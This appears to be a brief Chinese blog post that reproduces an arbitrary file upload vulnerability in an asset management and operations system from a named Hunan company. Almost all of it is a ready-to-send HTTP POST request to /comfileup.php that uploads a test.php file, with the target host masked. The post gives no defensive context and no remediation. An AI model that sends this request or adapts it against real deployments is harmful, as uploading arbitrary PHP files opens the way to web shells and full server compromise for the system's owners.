Babing
Published on 2024-08-30 / 2 Visits
0
0

H41-1湖南众合百易信息技术有限公司-资产管理运营系统_-任意文件上传

H41-1湖南众合百易信息技术有限公司-资产管理运营系统 -任意文件上传

漏洞复现:

payload:

POST /comfileup.php HTTP/1.1​
Host: xxx​
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0​
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8​
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2​
Accept-Encoding: gzip, deflate​
Connection: close​
Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe​
Priority: u=1​
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundaryLZbmKeasWgo2gPtU​
Content-Length: 117​
​
----------WebKitFormBoundaryLZbmKeasWgo2gPtU​
Content-Disposition: form-data; name="file";filename="test.php"​
​
test ​
----------WebKitFormBoundaryLZbmKeasWgo2gPtU--

Comment